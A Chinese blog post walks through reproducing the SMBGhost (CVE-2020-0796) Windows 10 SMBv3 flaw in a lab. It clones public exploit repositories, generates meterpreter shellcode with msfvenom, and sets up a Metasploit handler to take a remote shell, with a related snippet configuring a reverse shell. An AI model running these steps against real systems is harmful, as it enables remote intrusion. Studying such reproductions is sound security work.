win10 永恒之黑复现

最新推荐文章于 2024-05-21 08:54:04 发布
最新推荐文章于 2024-05-21 08:54:04 发布
阅读量1.7k 收藏 19
点赞数 4
分类专栏: 计算机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niqiu320/article/details/117415777
版权

永恒之黑复现

一:漏洞简介

漏洞原理:
SMB远程代码执行漏洞
SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入侵。
Windows 10和Windows Server 2016引入了SMB 3.1.1 。本次漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。利用该漏洞,黑客可直接远程攻击SMB服务端远程执行任意恶意代码,亦可通过构建恶意SMB服务端诱导客户端连接从而大规模攻击客户端。

影响范围:
Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)

二:漏洞复现

环境下载:
Windows 10 教育版Build 10.0.18362
POC扫描工具
POC利用工具
EXP漏洞利用

复现环境:
攻击机:Kali—>192.168.1.456
靶机:Win10—>192.168.1.123

步骤一:扫描漏洞
git clone https://github.com/ollypwn/SMBGhost.git
进入工具目录 输入命令进行扫描
python3 scanner.py 靶机iP
Vulnerable代表目标存在漏洞,可以进行攻击!

步骤二:漏洞利用-蓝屏
目标:使目标主机蓝屏
原理:该脚本连接到目标主机,并在转换头中设置了错误的偏移量字段的情况下压缩了身份验证请求,从而导致解压缩器缓冲溢出并导致目标崩溃。
git clone https://github.com/eerykitty/CVE-2020-0796-PoC.git
进入工具目录,输入命令对目标机进行攻击
python3 CVE-2020-0796.py 靶机ip
在这里插入图片描述

步骤三:漏洞利用-Getshell
1:在KALI系统内下载漏洞利用exp
git clone https://github.com/chompie1337/SMBGhost_RCE_PoC.git

2:使用Msfvenom生成正向连接攻击载荷(木马) 端口为:6666
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=6666 -b ‘\x00’ -i 1 -f python

说明:
#-p payload
#-e 编码方式
#-b 在生成的程序中避免出现的值
#LHOST,LPORT 监听上线的主机IP和端口
#-f exe 生成EXE格式
#‘\x00‘转义字符,对应ascall码中为null,因为是二进制文件所以会出现,在python中作为结束的标志,有点相当于%00截断的感觉。
在这里插入图片描述

3:用生成的shellcode将工具目录中exploit.py中的这一部分替换掉(buf后的字符串,保留USER_PAYLOAD不变)小诀窍,先整体粘贴复制,然后将buf 替换为 user_paload,就不用一行一行粘贴了,节省了很多时间。以下是exploit.py替换后的内容:(生成的内容是变化的)
在这里插入图片描述

4: 打开msfconsole监听目标机指定端口[端口:6666]

msfconsole use exploit/multi/handler
set payload
windows/x64/meterpreter/bind_tcp
set lport 6666 //目标端口 set rhost
set rhost 靶机ip //目标机ip
run

5:运行exploit.py脚本,反弹shell

python3 exploit.py -ip 靶机ip

6:msfconsole已经连接到了目标机进行权限维持(不用看图示IP)(在这一步我复现失败,监听不成功,猜测是win10版本问题,看网上也有很多跟我一样的情况,说是多试验几次。。。希望知道问题解决方法的可以留个言!)
在这里插入图片描述
在这里插入图片描述

7:主机远程链接kali机!
在这里插入图片描述

香芋320
关注
  • 4
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
永恒复现(CVE-2020-0796)
weixin_45006525的博客
06-04 1929
漏洞环境虚拟机搭建:迅雷下载 ed2k://|file|cn_windows_10_business_editions_version_1903_x64_dvd_e001dd2c.iso|4815527936|47D4C57E638DF8BF74C59261E2CE702D|/ 适用windows10版本: 适用于32位系统的Windows 10版本1903 Windows 10 1903版(用于基于x64的系统) Windows 10 1903版(用于基于ARM64的系统) Windows Server
经典利用永恒之蓝漏洞对Windows操作系统进行攻击
热门推荐
qq_46202048的博客
11-25 1万+
利用永恒之蓝对Windows进行攻击 环境搭建:kali、Windows server 2008R2、Windows 7,其中Windows server 2008R2\WIN7为靶机。 首先简单介绍一下什么是永恒之蓝,永恒之蓝【Eternal Blue】爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到
掌握安全渗透测试:利用永恒漏洞获取Windows 10系统访问权限
weixin_43822401的博客
05-21 1215
靶机:IP地址为,运行Windows 10 1903版本。攻击机:IP地址为。文档提供了利用永恒漏洞对Windows 10进行渗透的详细步骤,包括获取初始访问、创建远程桌面用户、开启后门以及维持权限访问。请注意,这些步骤仅供教育目的,实际操作应在授权的渗透测试和安全研究环境中进行。未经授权的渗透测试可能违反法律。
Kali MSF攻击Win10
nlj1860453的博客
01-05 1219
如果没有问题,它会打开监听,现在我们在Windows上运行木马文件,Windows如果没有任何反应,只是鼠标转圈圈,MSF输出了“meterpreter>“字样的时候,攻击就成功了!运行后就可以看到此路径下有一个叫“shell.exe”的可执行文件,把他拖到Windows上(实际情况是我爸的电脑,可以使用社会工程学上传上去),这一步就大功告成了!我Windows的IP是192.168.1.1*,我kali的IP是192.168.1.*。如果你的虚拟机是VM虚拟机,那么你下载VM图标的,其它虚拟机以此类推。
kali攻击命令大全_利用msf攻击win10
weixin_35513543的博客
11-27 1万+
攻击环境:攻击者系统:虚拟机下kali linux靶机系统:win10(需要打开Easy File Sharing服务)攻击者ip:10.3.134.27靶机ip:10.3.37.56攻击者和靶机在同一个wifi下,保证在同一网段里,能互相ping通。漏洞利用:EsayFileSharing注意点: 攻击者的虚拟机网络模式应选择桥接模式。准备工作完成,可以开始内网渗透之旅了。step-1首先我们先...
永恒(CVE-2020-0796)
小白一枚多多关注的博客
11-16 1万+
2017年时微软爆出了高危漏洞——永恒之蓝,3年后微软又爆出了一个继永恒之蓝的高危漏洞——永恒,该漏洞所瞄准的服务都是SMB服务,额,在此不得不说,SMB服务既然那么鸡肋不如换一个来代替它,那样还能剩出一大笔钱来做操作系统的优化..... 今天我们来介绍永恒之蓝的姊妹篇——永恒(因为名字太像了,所以我就给他们认了个亲戚)。 对了,该漏洞好像不针对windows7,它是为了windows10来的。 实验环境: kali windows10 ...
msf win10系统攻击
WEB渗透测试 从入门到萌新
10-02 4711
win10系统攻击msf
永恒之蓝复现kaliwin7
最新发布
07-19
### 恒之蓝漏洞复现:Kali Linux 攻击 Windows 7 #### 实验背景及目的 “永恒之蓝”(EternalBlue)是一种针对 Windows 操作系统的严重漏洞,该漏洞允许攻击者在无需用户交互的情况下实现远程代码执行。本次实验...
渗透基础笔记+作业(永恒之蓝复现
09-08
渗透测试是一种重要的网络安全评估方法...对于特定的漏洞如“永恒之蓝”,了解其工作原理和复现过程,对于提高网络安全防护至关重要。同时,测试报告的编写也是整个过程的成果展示,为防御者提供了改进安全策略的依据。
Win10串口调试助手.rar
07-07
Win10串口调试助手:开启你的硬件通信之旅》 在现代计算机技术中,串行接口(Serial Port)仍然是设备通信的一种重要方式,尤其是在嵌入式系统、物联网设备以及工业自动化领域。对于开发者而言,理解和掌握串口...
实战:入侵win10
zhaoyuhan1124的博客
08-29 1万+
简介 网上看到有人发布的关于win10的入侵流程,正好手上有两台电脑,大致说一下我的思路吧 原理 原理其实都是差不多的,即想办法把你的后门植入系统,然后远程控制。随着win10越来越安全,如果对方防备完善的话, 防火墙全开,远程端口默认禁止,附带杀毒软件,那么很难不通过物理接触感染系统。这里的思路利用win10的secure boot 提权然后拿到Administrator帐号进行入侵 步骤 简要...
Kali渗透Windows服务器
yy1715713348的博客
07-31 962
本实验通过利用kali进行漏洞扫描,使用Metasploit对目标主机进行渗透测试,并根据报告做出相应的防护措施,共分为3个实验步骤,详情如下;1、 实战步骤一:生成setup.exe后门程序,即木马程序。(1) 打开kali终端,输入ifconfig, 得到本机ip为192.168.189.130。如下图:(2)输入以下命令,使用msfpayload生成名为setup的后门程序:如下图:(3) 进入setup.exe所在目录,修改属性:选择“允许以程序执行文件”。
Kali利用msf渗透Windows电脑(超详细)
jennycisp的博客
02-27 2625
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。
【权限提升】 Windows10 本地提权漏洞复现及详细分析(CVE-2021-1732)
做自己喜欢的事,并将其发挥到极致!
12-07 4605
CVE-2021-1732 是蔓灵花(BITTER)APT 组织在某次被披露的攻击行动中使用的 0day 漏洞,该高危漏洞可以在本地将普通用户进程的权限提升至最高的 。属于windows系统级别的二进制漏洞。
msf利用web_delivery模块 攻击windows实例
cuteyann的博客
05-15 624
目标机存在命令注入漏洞,使用web_delivery模块生成的一条命令建立连接,并且不会在目标主机磁盘写文件,留下文件信息。7、在复制的命令前添加127.0.0.1 && (因为&&命令执行),然后在dvwa命令注入靶场中提交。这里使用比较老的python做webshell就可以了,输入命令:set target 0。(在目标机的cmd也可执行,前提是目标机已经安装了python)8、查看session,然后连接,就可用对目标机进行操作啦。红框里就是生成的命令,把它复制下来。6、运行,输入命令:run。
通过msf渗透win10
qq_63651088的博客
03-22 1510
提前将kali设置成桥接模式,与win10在同一个网段下。将payload.exe文件发送至win10下。还有更多利用方式,可自行探索。
CVE-2020-0796 SMB远程代码执行漏洞(分析、验证及加固)
Adminxe的博客
06-14 5034
0x00 前言 最近一段时间一直忙,挺火的CVE-2020-0796 (永恒)都没来的及复现,今天趁着网快,赶快把漏洞系统下载下,并且准备了 检测 payload 、蓝屏 payload 、提权payload、命令执行payload,复现一波,相比起来,只是payload不同而已,来实现不同的功能,下面进行分析。 0x01 漏洞描述 漏洞公告显示,SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远...
msf win10漏洞_永恒:CVE20200796漏洞复现
05-28
这不是一个问题,而是一个主题。如果您想要了解如何复现 CVE-2020-0796(也称为“永恒”漏洞),我可以为您提供一些指导。 首先,您需要具备一定的渗透测试技能和经验,因为该漏洞需要进行端口扫描、漏洞利用等操作,属于比较高级的渗透测试技术。 其次,您需要准备好相应的工具和环境,比如Metasploit框架、Kali Linux等,以及目标机器的Windows 10操作系统。 最后,您可以按照以下步骤进行CVE-2020-0796漏洞的复现: 1. 扫描目标机器,查看是否存在SMBv3漏洞。您可以使用nmap等工具进行扫描。 2. 使用Metasploit框架中的“exploit/windows/smb/cve_2020_0796_poc”模块进行漏洞利用。该模块可以通过以下命令进行设置: set RHOSTS [目标IP地址] set RPORT 445 set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST [攻击机IP地址] 3. 运行exploit命令,进行漏洞利用。 请注意,上述操作仅供学习和研究目的,不得用于非法攻击和侵犯他人隐私。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值